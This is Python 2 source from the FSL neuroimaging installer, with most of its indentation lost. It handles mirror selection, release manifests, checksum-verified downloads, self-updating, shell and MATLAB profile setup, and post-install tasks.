def fastest_mirror(main_mirrors, mirrors_file, timeout=20):
'''Find the fastest mirror for FSL downloads.'''
MsgUser.debug("Calculating fastest mirror")
socket.setdefaulttimeout(timeout)
# Get the mirror list from the url
fastestmirrors = {}
mirrorlist = []
for m in main_mirrors:
MsgUser.debug("Trying %s" % (m))
m_url = '/'.join((m.strip('/'), mirrors_file))
MsgUser.debug("Attempting to open %s" % (m_url))
try:
response = urllib2.urlopen(url=m_url)
except urllib2.HTTPError, e:
MsgUser.debug("%s %s" % (m_url, e.msg))
raise SiteNotResponding(e.msg)
except urllib2.URLError, e:
if isinstance(e.reason, socket.timeout):
MsgUser.debug("Time out trying %s" % (m_url))
raise SiteNotResponding(m)
else:
MsgUser.debug(e.reason.args[1])
raise SiteNotResponding(e.reason.args[1])
except socket.timeout, e:
MsgUser.debug(e)
raise SiteNotResponding(str(e))
except Exception, e:
MsgUser.debug("Unhandled exception %s" % (str(e)))
raise
else:
mirrorlist = response.read().strip().split('\n')
MsgUser.debug("Received the following "
"mirror list %s" % (mirrorlist))
continue
if len(mirrorlist) == 0:
raise ServerFailure("Cannot find FSL download servers")
# Check timings from the urls specified
if len(mirrorlist) > 1:
for mirror in mirrorlist:
MsgUser.debug("Trying %s" % (mirror))
then = time.time()
if mirror.startswith('http:'):
serverport = 80
elif mirror.startswith('https:'):
serverport = 443
else:
raise ServerFailure("Unrecognised protocol")
try:
mysock = socket.create_connection((mirror, serverport),
timeout)
pingtime = time.time() - then
mysock.close()
fastestmirrors[pingtime] = mirror
MsgUser.debug("Mirror responded in %s seconds" % (pingtime))
except socket.gaierror, e:
MsgUser.debug("%s can't be resolved" % (e))
except socket.timeout, e:
MsgUser.debug(e)
if len(fastestmirrors) == 0:
raise ServerFailure('Failed to contact any FSL download sites.')
download_url = fastestmirrors[min(fastestmirrors.keys())]
else:
download_url = mirrorlist[0]
return download_url
# Concept:
# Web app creates the following files:
# fslmirrorlist.txt - contains a list of mirror urls
# fslreleases.json - contains the available maps for oses
# mapping to a download url
# {'installer' {
# 'filename': 'fslinstaller.py',
# 'version': '3.0.0',
# 'date': '02/03/2017',
# 'checksum_type', 'sha256',
# 'checksum'},
# 'linux' : {
# 'centos' : {
# 'x86_64': {
# '6': {
# '5.0.9': {
# 'filename': 'fsl-5.0.9-centos6_64.tar.gz',
# 'version': '5.0.9',
# 'date': '01/02/2017',
# 'checksum_type', 'sha256',
# 'checksum': 'abf645662bcf4453235',
# },
# },
# },
# },
# 'rhel' : {'alias': 'centos'}},
# 'apple' : {
# 'darwin' : {
# 'x86_64': {
# '11': {
# ....
# },
# }
@memoize
def get_web_manifest(download_url, timeout=20):
'''Download the FSL manifest from download_url'''
socket.setdefaulttimeout(timeout)
MsgUser.debug("Looking for manifest at %s." % (download_url))
if HAS_JSON:
MsgUser.debug("Downloading JSON file")
return get_json(download_url + Settings.manifest_json)
else:
MsgUser.debug("Downloading CSV file")
return get_csv_dict(download_url + Settings.manifest_csv)
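# Illustrative sketch, not called anywhere: walking the nested manifest
# described in the "Concept" comment above, as returned by get_web_manifest().
# The keys ('linux', 'centos', 'x86_64', '6', '5.0.9') are assumed example
# values; what is really available depends on the download server.
def _example_manifest_lookup(manifest):
    try:
        release = manifest['linux']['centos']['x86_64']['6']['5.0.9']
        return (release['filename'],
                release['checksum_type'],
                release['checksum'])
    except KeyError:
        # This OS/architecture/version combination is not on the server
        return None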
class GetFslDirError(Exception):
pass
@memoize
def get_fsldir(specified_dir=None, install=False):
'''Find the installed version of FSL using FSLDIR
or location of this script'''
def validate_fsldir(directory):
parent = os.path.dirname(directory)
if parent == directory:
raise GetFslDirError(
"%s appears to be the root folder" %
parent)
if not os.path.exists(parent):
raise GetFslDirError(
"%s doesn't exist" %
parent)
if not os.path.isdir(parent):
raise GetFslDirError(
"%s isn't a directory" %
parent)
if (os.path.exists(directory) and not
os.path.exists(os.path.join(
directory, 'etc', 'fslversion'
))):
raise GetFslDirError(
"%s exists and doesn't appear to be an installed FSL folder" %
directory)
if specified_dir:
if install is False:
if not check_fsl_install(specified_dir):
raise GetFslDirError(
"%s isn't an 'fsl' folder" %
specified_dir)
else:
validate_fsldir(specified_dir)
return specified_dir
try:
fsldir = os.environ['FSLDIR']
try:
validate_fsldir(fsldir)
except GetFslDirError:
# FSLDIR environment variable is incorrect!
MsgUser.warning('FSLDIR environment variable '
'does not point at FSL install, ignoring...')
MsgUser.debug('FSLDIR is set to %s - '
'this folder does not appear to exist' % (fsldir))
fsldir = None
else:
fsldir = fsldir.rstrip('/')
if MsgUser.isquiet():
return fsldir
except KeyError:
# Look to see if I'm in an FSL install
try:
my_parent = os.path.dirname(
os.path.dirname(os.path.realpath(__file__)))
except NameError:
# Running in debugger - __file__ not set, assume it's cwd
my_parent = os.path.dirname(
os.path.dirname(os.getcwd()))
try:
validate_fsldir(my_parent)
fsldir = my_parent
except GetFslDirError:
fsldir = None
if not install:
MsgUser.debug("asking about %s" % (fsldir))
valid_dir = False
while not valid_dir:
fsldir = Settings.inst_qus.ask_question(
'inst_loc', default=fsldir)
try:
validate_fsldir(fsldir)
valid_dir = True
except GetFslDirError, e:
                    MsgUser.failed(str(e))
return fsldir
else:
if not MsgUser.isquiet():
valid_dir = False
while not valid_dir:
fsldir = Settings.inst_qus.ask_question(
'location', default=fsldir)
try:
validate_fsldir(fsldir)
valid_dir = True
except GetFslDirError, e:
MsgUser.failed(str(e))
MsgUser.message(
'''Hint - press Enter to select the default value '''
'''given in the square brackets.
If you are specifying a destination folder this needs to either be an existing
FSL install folder or a folder that doesn't already exist.''')
fsldir = None
else:
raise GetFslDirError(
"I can't locate FSL, try again using '-d <FSLDIR>' "
"to specify where to find the FSL install")
return fsldir
def archive_version(archive):
'''Takes the path to a FSL install file
and works out what version it is.'''
if not os.path.isfile(archive):
raise NotAFslVersion("%s is not a file" % (archive))
else:
# file is of form: fsl-V.V.V-platform.extensions
(_, vstring, _) = archive.strip().split('-', 2)
try:
return Version(vstring)
except ValueError:
raise NotAFslVersion(
"%s doesn't look like "
"a version number" % (vstring))
class NotAFslVersion(Exception):
pass
class GetInstalledVersionError(Exception):
pass
def get_installed_version(fsldir):
'''Takes path to FSLDIR and finds installed version details'''
MsgUser.debug("Looking for fsl in %s" % fsldir)
v_file = os.path.join(fsldir, 'etc', 'fslversion')
if os.path.exists(v_file):
f = open(v_file)
v_string = f.readline()
f.close()
try:
version = Version(v_string.strip())
except ValueError:
raise NotAFslVersion(
"%s not a valid "
"version string" % (v_string.strip()))
else:
MsgUser.debug(
"No version information found - "
"is this actually an FSL dir?")
raise GetInstalledVersionError(
"Cannot find the version information - "
"is this actually an FSL dir?")
MsgUser.debug("Found version %s" % (version))
return version
def which_shell():
return os.path.basename(os.getenv("SHELL"))
class SelfUpdateError(Exception):
pass
def self_update(server_url):
'''Check for and apply an update to myself'''
# See if there is a newer version available
if 'fslinstaller' in sys.argv[0]:
try:
installer = get_installer(server_url)
except GetInstallerError, e:
MsgUser.debug("Failed to get installer version %s." % (str(e)))
raise SelfUpdateError('Failed to get installer version. '
'Please try again later.')
MsgUser.debug("Server has version " + installer['version'])
if Version(installer['version']) <= version:
MsgUser.ok("Installer is up-to-date.")
return
# There is a new version available - download it
MsgUser.message("There is a newer version (%s) of the installer "
"(you have %s) updating..." % (
installer['version'], version))
(_, tmpfname) = temp_file_name(mode='w', close=True)
downloaded = False
while downloaded is False:
try:
file_url = '/'.join(
(Settings.mirror.rstrip('/'), installer['filename']))
download_file(
url=file_url,
localf=tmpfname)
if (
file_checksum(tmpfname, installer['checksum_type']) !=
installer['checksum']):
raise SelfUpdateError(
"Found update to installer but download "
"was corrupt. Please try again later.")
except DownloadFileError, e:
if Settings.mirror != Settings.main_mirror:
MsgUser.warning(
"Download from mirror failed, re-trying from "
"main FSL download site")
Settings.mirror = Settings.main_mirror
else:
MsgUser.debug("Failed to update installer %s." % (str(e)))
raise SelfUpdateError(
'Found update to installer but unable to '
'download the new version. Please try again.')
else:
downloaded = True
# Now run the new installer
# EXEC new script with the options we were given
os.chmod(tmpfname, 0755)
c_args = [sys.executable, tmpfname, ]
c_args.extend(sys.argv[1:])
MsgUser.debug(
"Calling %s %s" % (sys.executable, c_args))
os.execv(sys.executable, c_args)
else:
# We are now running the newly downloaded installer
MsgUser.ok('Installer updated to latest version %s' % (str(version)))
MsgUser.ok("Installer self update successful.")
class ServerFailure(Exception):
pass
class BadVersion(Exception):
pass
class GetInstallerError(Exception):
pass
def get_installer(server_url):
MsgUser.debug("Checking %s for "
"installer information" % (server_url))
manifest = get_web_manifest(server_url)
return manifest['installer']
@memoize
def get_releases(server_url):
'''Return a hash with all information about available
versions for this OS'''
computer = Host
MsgUser.debug("Getting web manifest")
manifest = get_web_manifest(server_url)
try:
os_definition = manifest[computer.o_s][computer.vendor]
except KeyError:
raise UnsupportedOs("%s %s not supported by this installer" % (
computer.o_s, computer.vendor
))
if 'alias' in os_definition.keys():
t_version = computer.version.major
while t_version > 0:
MsgUser.debug("Trying version %s" % (t_version))
try:
os_parent = os_definition['alias'][
str(t_version)]['parent']
break
except KeyError:
MsgUser.debug("...not found")
if t_version == (computer.version.major - 1):
MsgUser.warning(
"%s %s not officially supported "
"- trying to locate support for an earlier version - "
"this may not work" % (
computer.vendor, computer.version.major))
t_version -= 1
if t_version == 0:
raise UnsupportedOs("%s %s not supported" % (
computer.vendor,
str(computer.version.major)
))
os_definition = manifest[computer.o_s][os_parent]
if computer.arch not in os_definition.keys():
raise UnsupportedOs("%s %s not supported" % (
computer.vendor,
computer.arch
))
os_versions = os_definition[computer.arch]
t_version = computer.version.major
while t_version > 0:
MsgUser.debug("Trying version %s" % (t_version))
if str(t_version) not in os_versions.keys():
MsgUser.debug("...not found")
if t_version == (computer.version.major - 1):
MsgUser.warning(
"%s %s not officially supported "
"- trying to locate support for an earlier version - "
"this may not work" % (
computer.vendor, computer.version.major))
t_version -= 1
else:
break
if t_version == 0:
raise UnsupportedOs("%s %s not supported" % (
computer.vendor,
computer.version.major
))
return os_versions[str(t_version)]
class ExtraDownloadError(Exception):
pass
@memoize
def get_extra(server_url, extra_type):
'''Return a hash with all information about available
versions of source code'''
MsgUser.debug("Getting web manifest")
manifest = get_web_manifest(server_url)
try:
extra = manifest[extra_type]
except KeyError:
raise ExtraDownloadError("Unrecognised extra %s" % (extra_type))
return extra
class ImproperlyConfigured(Exception):
pass
def list_releases(url):
releases = get_releases(url)
MsgUser.message("Available FSL versions for this OS:")
MsgUser.debug(releases)
for v in releases.keys():
MsgUser.message("%s\t(%s)" % (v, releases[v]['date']))
def latest_release(url):
releases = get_releases(url)
MsgUser.debug("Got version information: %s" % (releases))
versions = [Version(x) for x in releases.keys()]
MsgUser.debug("Versions: %s" % (versions))
return releases[str(sorted(versions)[-1])]
class InstallInstallerError(Exception):
pass
def install_installer(fsldir):
'''Install this script into $FSLDIR/etc'''
targetfolder = os.path.join(fsldir, 'etc')
as_root = False
installer = os.path.abspath(__file__)
MsgUser.debug(
"Copying fslinstaller (%s) to %s" % (
installer,
targetfolder))
if not is_writeable(targetfolder):
if not is_writeable_as_root(targetfolder):
raise InstallInstallerError("Cannot write to folder as root user.")
else:
as_root = True
copy_file(
installer, os.path.join(targetfolder, "fslinstaller.py"),
as_root)
class InstallQuestions(object):
def __init__(self):
self.questions = {}
self.validators = {}
self.type = {}
self.default = {}
self.defaults = False
def add_question(self, key, question, default, qtype, validation_f):
self.questions[key] = question
self.default[key] = default
self.type[key] = qtype
self.validators[key] = validation_f
def ask_question(self, key, default=None):
# Ask a question
no_answer = True
validator = self.validators[key]
def parse_answer(q_type, answer):
if q_type == 'bool':
if answer.lower() == 'yes':
return True
else:
return False
else:
return answer
if not default:
default = self.default[key]
if self.defaults:
MsgUser.debug(self.questions[key])
MsgUser.debug("Automatically using the default %s" % (default))
            answer = parse_answer(self.type[key], default)
no_answer = False
while no_answer:
MsgUser.question(
"%s? %s:" % (
self.questions[key],
'[%s]' % (default)))
your_answer = raw_input()
MsgUser.debug("Your answer was %s" % (your_answer))
if your_answer == '':
MsgUser.debug("You want the default")
your_answer = default
if validator(your_answer):
answer = parse_answer(self.type[key], your_answer)
no_answer = False
MsgUser.debug("Returning the answer %s" % (answer))
return answer
def yes_no(answer):
if answer.lower() == 'yes' or answer.lower() == 'no':
return True
else:
MsgUser.message("Please enter yes or no.")
return False
def check_install_location(folder):
'''Don't allow relative paths'''
MsgUser.debug("Checking %s is an absolute path" % (folder))
if (folder == '.' or
folder == '..' or
folder.startswith('./') or
folder.startswith('../') or
folder.startswith('~')):
MsgUser.message("Please enter an absolute path.")
return False
return True
def external_validate(what_to_check):
'''We will validate elsewhere'''
return True
def check_fsl_install(fsldir):
'''Check if this folder contains FSL install'''
MsgUser.debug("Checking %s is an FSL install" % (fsldir))
if os.path.isdir(fsldir):
if os.path.exists(
os.path.join(fsldir, 'etc', 'fslversion')
):
return True
return False
def fsl_downloadname(suffix, version):
return 'fsl-%s-%s' % (
version, suffix)
class Settings(object):
version = version
title = "--- FSL Installer - Version %s ---" % (version)
main_server = 'fsl.fmrib.ox.ac.uk'
mirrors = [build_url_with_protocol('https',
main_server, ('fsldownloads',
'')), ]
mirrors_file = 'fslmirrorlist.txt'
manifest_json = 'manifest.json'
manifest_csv = 'manifest.csv'
main_mirror = mirrors[0]
mirror = main_mirror
applications = ['bin/fslview.app', 'bin/assistant.app']
x11 = {'bad_versions': [],
'download_url': "http://xquartz.macosforge.org/landing/",
'apps': ['XQuartz.app', 'X11.app', ],
'location': "/Applications/Utilities"}
default_location = '/usr/local/fsl'
post_inst_dir = "etc/fslconf"
inst_qus = InstallQuestions()
inst_qus.add_question('version_match',
"The requested version matches the installed "
"version - do you wish to re-install FSL",
'no', 'bool', yes_no)
inst_qus.add_question('location',
"Where would you like the FSL install to be "
"(including the FSL folder name)",
default_location, 'path', check_install_location)
inst_qus.add_question('del_old',
"FSL exists in the current location, "
"would you like to keep a backup of the old "
"version (N.B. You will not be able to use the old "
"version)",
'no', 'bool', yes_no)
inst_qus.add_question('create',
"Install location doesn't exist, should I create it",
'yes', 'bool', yes_no)
inst_qus.add_question('inst_loc',
"Where is the FSL folder (e.g. /usr/local/fsl)",
default_location, 'path', check_fsl_install)
inst_qus.add_question('skipmd5',
"I was unable to download the checksum of "
"the install file so cannot confirm it is correct. "
"Would you like to install anyway",
'no', 'bool', yes_no)
inst_qus.add_question('overwrite',
"There is already a local copy of the file, would "
"you like to overwrite it",
"yes", 'bool', yes_no)
inst_qus.add_question('upgrade',
"Would you like to install upgrade",
"yes", 'bool', yes_no)
inst_qus.add_question('update',
"Would you like to install update",
"yes", 'bool', yes_no)
def get_json(web_url):
MsgUser.debug("Opening "+web_url)
try:
url = open_url(web_url)
return json.load(url)
except OpenUrlError, e:
raise ServerFailure(str(e))
# [ linux, centos, x86_64, 6, filename, 'fname',
# version, 'version', date, 'date', checksum_type, 'checksum_type',
# checksum, 'checksum', supported, 'true/false', notes, 'notes',
# instructions, 'instructions']
# [ linux, redhat, alias, centos, supported, True/false, version, 'version' ]
# [ 'installer', filename, 'fname', version, 'version', date, 'date',
# checksum_type, 'checksum_type', checksum, 'checksum', supported,
# 'true/false', notes, 'notes', instructions, 'instructions']
# [ feeds, filename, 'fname', version, 'version',
# date, 'date', checksum_type, 'checksum_type', checksum, 'checksum',
# supported, 'true/false', notes, 'notes', instructions, 'instructions']
# [ sources, filename, 'fname', version, 'version',
# date, 'date', checksum_type, 'checksum_type', checksum, 'checksum',
# supported, 'true/false', notes, 'notes', instructions, 'instructions']
class AutoDict(dict):
'''Automatically create a nested dict'''
def __getitem__(self, item):
try:
return dict.__getitem__(self, item)
except KeyError:
value = self[item] = type(self)()
return value
def freeze(self):
'''Returns a dict representation of an AutoDict'''
frozen = {}
for k, v in self.items():
if type(v) == type(self):
frozen[k] = v.freeze()
else:
frozen[k] = v
return frozen
def get_csv_dict(web_url):
MsgUser.debug("Opening "+web_url)
try:
url = open_url(web_url)
manifest_reader = csv.reader(
url, delimiter=',', quoting=csv.QUOTE_MINIMAL)
a_dict = AutoDict()
for line in manifest_reader:
MsgUser.debug(line)
if line[0] == 'feeds':
items = iter(line[1:])
base_dict = dict(zip(items, items))
a_dict[line[0]] = base_dict
elif line[0] == 'sources':
items = iter(line[1:])
base_dict = dict(zip(items, items))
a_dict[line[0]] = base_dict
elif line[0] == 'installer':
items = iter(line[1:])
base_dict = dict(zip(items, items))
a_dict[line[0]] = base_dict
else:
# Install package or alias
if line[2] == 'alias':
items = iter(line[4:])
base_dict = dict(zip(items, items))
a_dict[
str(line[0])][
str(line[1])][
str(line[2])][
str(line[3])] = base_dict
else:
items = iter(line[5:])
base_dict = dict(zip(items, items))
MsgUser.debug(
",".join(
(line[0], line[1], line[2], line[3], line[4])))
a_dict[
str(line[0])][
str(line[1])][
str(line[2])][
str(line[3])][
str(line[4])] = base_dict
except OpenUrlError, e:
raise ServerFailure(str(e))
MsgUser.debug(a_dict)
return a_dict.freeze()
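# A small sketch (not executed by the installer) of how one manifest CSV row,
# in the layout shown in the comments above, is folded into the nested
# dictionary by get_csv_dict(): the tail of the row is zipped into key/value
# pairs and filed under os/vendor/arch/os-version/fsl-version. The row
# contents are assumed example values only.
def _example_csv_row_to_dict():
    line = ['linux', 'centos', 'x86_64', '6', '5.0.9',
            'filename', 'fsl-5.0.9-centos6_64.tar.gz',
            'checksum_type', 'sha256', 'checksum', 'abf645662bcf4453235']
    a_dict = AutoDict()
    items = iter(line[5:])
    a_dict[line[0]][line[1]][line[2]][line[3]][line[4]] = dict(
        zip(items, items))
    return a_dict.freeze()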
class InvalidVersion(Exception):
pass
def get_web_version_and_details(
server_url=Settings.mirror,
request_version=None):
if request_version is None:
details = latest_release(server_url)
try:
version = Version(details['version'])
except KeyError:
try:
redirect = details['redirect']
raise DownloadError(
"Installer not supported on this platform."
"Please visit %s for download instructions" % redirect)
except KeyError:
MsgUser.debug(
"Can't find version or redirect - %s" % details)
raise DownloadError(
"Unsupported OS"
)
else:
MsgUser.debug("Requested version %s" % request_version)
releases = get_releases(server_url)
try:
version = Version(request_version)
except ValueError:
raise DownloadError(
"%s doesn't look like a version" % request_version)
if request_version not in releases.keys():
raise DownloadError(
"%s isn't an available version" % request_version)
details = releases[request_version]
return (version, details)
def download_release(
server_url=Settings.mirror, to_temp=False,
request_version=None, skip_verify=False,
keep=False, source_code=False, feeds=False):
(version, details) = get_web_version_and_details(
server_url, request_version)
if request_version is None:
request_version = str(version)
if source_code or feeds:
if source_code:
extra_type = 'sources'
MsgUser.message("Downloading source code")
else:
extra_type = 'feeds'
MsgUser.message("Downloading FEEDS")
try:
releases = get_extra(server_url, extra_type)
except ExtraDownloadError, e:
raise DownloadError(
"Unable to find details for %s" % (extra_type)
)
to_temp = False
try:
details = releases[request_version]
except KeyError:
raise DownloadError(
"%s %s isn't available" % (request_version, extra_type)
)
MsgUser.debug(details)
if to_temp:
try:
(_, local_filename) = temp_file_name(close=True)
except Exception, e:
MsgUser.debug("Error getting temporary file name %s" % (str(e)))
raise DownloadError("Unable to begin download")
else:
local_filename = details['filename']
if os.path.exists(local_filename):
if os.path.isfile(local_filename):
MsgUser.message("%s exists" % (local_filename))
overwrite = Settings.inst_qus.ask_question('overwrite')
if overwrite:
MsgUser.warning(
"Erasing existing file %s" % local_filename)
try:
os.remove(local_filename)
except:
raise DownloadError(
"Unabled to remove local file %s - remove"
" it and try again" % local_filename)
else:
raise DownloadError("Aborting download")
else:
raise DownloadError(
"There is a directory named %s "
"- cannot overwrite" % local_filename)
MsgUser.debug(
"Downloading to file %s "
"(this may take some time)." % (local_filename))
MsgUser.message(
"Downloading...")
downloaded = False
while downloaded is False:
try:
file_url = '/'.join(
(Settings.mirror.rstrip('/'), details['filename']))
download_file(
url=file_url,
localf=local_filename)
if (not skip_verify and
(details['checksum'] !=
file_checksum(local_filename, details['checksum_type']))):
raise DownloadError('Downloaded file fails checksum')
MsgUser.ok("File downloaded")
except DownloadFileError, e:
MsgUser.debug(str(e))
if Settings.mirror != Settings.main_mirror:
MsgUser.warning(
"Download from mirror failed, re-trying from "
"main FSL download site")
Settings.mirror = Settings.main_mirror
else:
raise DownloadError(str(e))
else:
downloaded = True
return (local_filename, version, details)
class DownloadError(Exception):
pass
def shell_config(shell, fsldir, skip_root=False):
MsgUser.debug("Building environment for %s" % (shell))
env_lines = ''
if shell == 'sh' or shell == 'bash':
if skip_root:
env_lines += '''if [ -x /usr/bin/id ]; then
if [ -z "$EUID" ]; then
# ksh and dash doesn't setup the EUID environment var
EUID=`id -u`
fi
fi
if [ "$EUID" != "0" ]; then
'''
env_lines += '''
# FSL Setup
FSLDIR=%s
PATH=${FSLDIR}/bin:${PATH}
export FSLDIR PATH
. ${FSLDIR}/etc/fslconf/fsl.sh
'''
if skip_root:
env_lines += '''fi'''
match = "FSLDIR="
replace = "FSLDIR=%s"
elif shell == 'csh' or shell == 'tcsh':
if skip_root:
env_lines += '''if ( $uid != 0 ) then
'''
env_lines += '''
# FSL Setup
setenv FSLDIR %s
setenv PATH ${FSLDIR}/bin:${PATH}
source ${FSLDIR}/etc/fslconf/fsl.csh
'''
if skip_root:
env_lines += '''
endif'''
match = "setenv FSLDIR"
replace = "setenv FSLDIR %s"
elif shell == 'matlab':
env_lines = '''
%% FSL Setup
setenv( 'FSLDIR', '%s' );
fsldir = getenv('FSLDIR');
fsldirmpath = sprintf('%%s/etc/matlab',fsldir);
path(path, fsldirmpath);
clear fsldir fsldirmpath;
'''
match = "setenv( 'FSLDIR',"
replace = "setenv( 'FSLDIR', '%s' );"
else:
raise ValueError("Unknown shell type %s" % shell)
return (env_lines % (fsldir), match, replace % (fsldir))
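# Illustrative sketch, never called by the installer, showing what
# shell_config() above produces for a bash user. '/usr/local/fsl' is simply
# the default install location from Settings, used here as an example.
def _example_shell_config():
    (env_lines, match, replace) = shell_config('bash', '/usr/local/fsl')
    # env_lines is the block appended to the user's profile, match is the
    # prefix searched for on re-installs ("FSLDIR=") and replace is the
    # corrected assignment ("FSLDIR=/usr/local/fsl").
    return (env_lines, match, replace)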
def get_profile(shell):
home = os.path.expanduser("~")
dotprofile = os.path.join(home, '.profile')
if shell == 'bash':
profile = os.path.join(home, '.bash_profile')
if not os.path.isfile(profile) and os.path.isfile(dotprofile):
profile = dotprofile
elif shell == 'sh':
profile = dotprofile
else:
cshprofile = os.path.join(home, '.cshrc')
if shell == 'csh':
profile = cshprofile
elif shell == 'tcsh':
profile = os.path.join(home, '.tcshrc')
if not os.path.isfile(profile) and os.path.isfile(cshprofile):
profile = cshprofile
else:
raise ValueError("Unsupported shell")
return profile
class FixFslDirError(Exception):
pass
def fix_fsldir(shell, fsldir):
(_, match, replace) = shell_config(shell, fsldir)
profile = get_profile(shell)
MsgUser.debug(
"Editing %s, replacing line beginning:%s with %s." %
(profile, match, replace))
try:
edit_file(profile, line_starts_replace, match, replace, False)
except EditFileError, e:
raise FixFslDirError(str(e))
class AddFslDirError(Exception):
pass
def add_fsldir(shell, fsldir):
(env_lines, _, _) = shell_config(shell, fsldir)
profile = get_profile(shell)
MsgUser.debug("Adding %s to %s" % (env_lines, profile))
try:
add_to_file(profile, env_lines, False)
except AddToFileError, e:
raise AddFslDirError(str(e))
class ConfigureMatlabError(Exception):
pass
class ConfigureMatlabWarn(Exception):
pass
def configure_matlab(fsldir, m_startup='', c_file=True):
'''Setup your startup.m file to enable FSL MATLAB functions to work'''
(mlines, match, replace) = shell_config('matlab', fsldir)
if m_startup == '':
m_startup = os.path.join(
os.path.expanduser('~'), 'matlab', 'startup.m')
if os.path.exists(m_startup):
# Check if already configured
MsgUser.debug("Looking for %s in %s" % (match, m_startup))
if file_contains(m_startup, match):
try:
MsgUser.debug('Updating MATLAB startup file.')
edit_file(
m_startup, line_starts_replace,
match, replace, False)
except EditFileError, e:
raise ConfigureMatlabError(str(e))
else:
MsgUser.debug('Adding FSL settings to MATLAB.')
try:
add_to_file(m_startup, mlines, False)
except AddToFileError, e:
raise ConfigureMatlabError(str(e))
elif c_file:
# No startup.m file found. Create one
try:
MsgUser.debug('No MATLAB startup.m file found, creating one.')
if not os.path.isdir(os.path.dirname(m_startup)):
                MsgUser.debug('No MATLAB folder found, creating one.')
os.mkdir(os.path.dirname(m_startup))
create_file(m_startup, mlines, False)
except (OSError, CreateFileError), e:
MsgUser.debug(
'Unable to create ~/matlab folder or startup.m file,'
                ' cannot configure (%s).' % (str(e)))
raise ConfigureMatlabError(
"Unable to create your ~/matlab folder or startup.m, "
"so cannot configure MATLAB for FSL.")
else:
MsgUser.debug('MATLAB may not be installed, doing nothing.')
raise ConfigureMatlabWarn("I can't tell if you have MATLAB installed.")
class SetupEnvironmentError(Exception):
pass
class SetupEnvironmentSkip(Exception):
pass
def setup_system_environment(fsldir):
'''Add a system-wide profile setting up FSL for all users.
Only supported on Redhat/Centos'''
profile_d = '/etc/profile.d'
profile_files = ['fsl.sh', 'fsl.csh']
exceptions = []
skips = []
if os.getuid() != 0:
sudo = True
else:
sudo = False
if os.path.isdir(profile_d):
for profile in profile_files:
pf = profile.split('.')[1]
(lines, match, replace) = shell_config(pf, fsldir)
this_profile = os.path.join(profile_d, profile)
if os.path.exists(this_profile):
# Already has a profile file
# Does it contain an exact match for current FSLDIR?
match = file_contains_1stline(this_profile, replace)
if match != '':
# If there is an fsl.(c)sh then just fix
# the entry for FSLDIR
MsgUser.debug(
"Fixing %s for FSLDIR location." % (this_profile))
try:
edit_file(
this_profile, line_starts_replace,
match, replace, sudo)
except EditFileError, e:
exceptions.append(str(e))
else:
# No need to do anything
MsgUser.debug(
"%s already configured - skipping." %
(this_profile))
skips.append(profile)
else:
# Create the file
try:
create_file(profile, lines, sudo)
except CreateFileError, e:
exceptions.append(str(e))
else:
raise SetupEnvironmentError(
"No system-wide configuration folder found - Skipped")
if exceptions:
raise SetupEnvironmentError(".".join(exceptions))
if skips:
raise SetupEnvironmentSkip(".".join(skips))
def setup_environment(fsldir=None, system=False, with_matlab=False):
'''Setup the user's environment so that their
terminal finds the FSL tools etc.'''
# Check for presence of profile file:
if fsldir is None:
fsldir = get_fsldir()
user_shell = which_shell()
MsgUser.debug("User's shell is %s" % (user_shell))
try:
profile_lines = shell_config(user_shell, fsldir)
profile = get_profile(user_shell)
except ValueError, e:
raise SetupEnvironmentError(str(e))
cfile = False
if not os.path.isfile(profile):
MsgUser.debug("User is missing a shell setup file.")
cfile = True
if cfile:
MsgUser.debug("Creating file %s" % (profile))
try:
create_file(profile, profile_lines, False)
except CreateFileError, e:
raise SetupEnvironmentError(
"Unable to create profile %s" % (profile))
else:
# Check if user already has FSLDIR set
MsgUser.message("Setting up FSL software...")
try:
if file_contains(profile, "FSLDIR"):
MsgUser.debug("Updating FSLDIR entry.")
fix_fsldir(user_shell, fsldir)
else:
MsgUser.debug("Adding FSLDIR entry.")
add_fsldir(user_shell, fsldir)
except (AddFslDirError, FixFslDirError), e:
raise SetupEnvironmentError(
"Unable to update your profile %s"
" with FSL settings" % (profile))
if with_matlab:
MsgUser.debug("Setting up MATLAB")
try:
configure_matlab(fsldir)
except ConfigureMatlabError, e:
MsgUser.debug(str(e))
raise SetupEnvironmentError(str(e))
except ConfigureMatlabWarn, e:
MsgUser.skipped(str(e))
class PostInstallError(Exception):
pass
class InstallArchiveError(Exception):
pass
class UnknownArchiveType(Exception):
pass
def archive_type(archive):
'''Determine file type based on extension and check
that file looks like this file type'''
archive_types = {
'gzip': ('tar', '-z'),
'bzip2': ('tar', '-j'),
'zip': ('zip', ''), }
try:
file_type = run_cmd("file %s" % (archive))
except RunCommandError, e:
raise UnknownArchiveType(str(e))
file_type = file_type.lower()
for f_type in ('gzip', 'bzip2', 'zip', ):
if f_type in file_type:
return archive_types[f_type]
raise UnknownArchiveType(archive)
def post_install(
fsldir, settings, script="post_install.sh", quiet=False,
app_links=False, x11=False):
MsgUser.message("Performing post install tasks")
if is_writeable(fsldir):
as_root = False
elif is_writeable_as_root(fsldir):
as_root = True
else:
raise PostInstallError(
"Unable to write to target folder (%s)" % (fsldir))
install_installer(fsldir)
script_path = os.path.join(fsldir, Settings.post_inst_dir, script)
if x11:
try:
check_X11(settings.x11)
except CheckX11Warning, e:
MsgUser.warning(str(e))
else:
MsgUser.ok("X11 (required for GUIs) found")
if os.path.exists(script_path):
MsgUser.debug("Found post-install script %s" % (script_path))
if not os.access(script_path, os.X_OK):
raise PostInstallError(
"Unable to run post install script %s" % (script_path)
)
script_opts = '-f "%s"' % (fsldir)
if quiet:
script_opts += " -q"
command_line = " ".join((script_path, script_opts))
try:
run_cmd_displayoutput(command_line, as_root=as_root)
except RunCommandError, e:
raise PostInstallError(
"Error running post installation script (error %s)"
" - check the install log" % (str(e))
)
# Work around for mistake in 5.0.10 post setup script
mal = os.path.join(
fsldir, Settings.post_inst_dir,
'make_applications_links.sh')
if (os.path.exists(mal) and
not file_contains(script_path, "make_applications_links.sh")):
MsgUser.debug(
"Work around necessary for missing app link creation")
else:
app_links = False
if app_links:
try:
make_applications_links(fsldir, settings.applications)
except MakeApplicationLinksError, e:
for message in e.app_messages.values():
MsgUser.warning(message)
else:
MsgUser.ok("/Applications links created/updated")
MsgUser.ok("Post installation setup complete")
def install_archive(archive, fsldir=None):
def clean_up_temp():
try:
safe_delete(tempfolder, as_root)
except SafeDeleteError, sd_e:
MsgUser.debug(
"Unable to clean up temporary folder! "
"%s" % (str(sd_e)))
if not os.path.isfile(archive):
raise InstallError("%s isn't a file" % (archive))
if not fsldir:
try:
fsldir = get_fsldir(specified_dir=fsldir, install=True)
except GetFslDirError, e:
raise InstallError(str(e))
MsgUser.debug("Requested install of %s as %s" % (archive, fsldir))
if os.path.exists(fsldir):
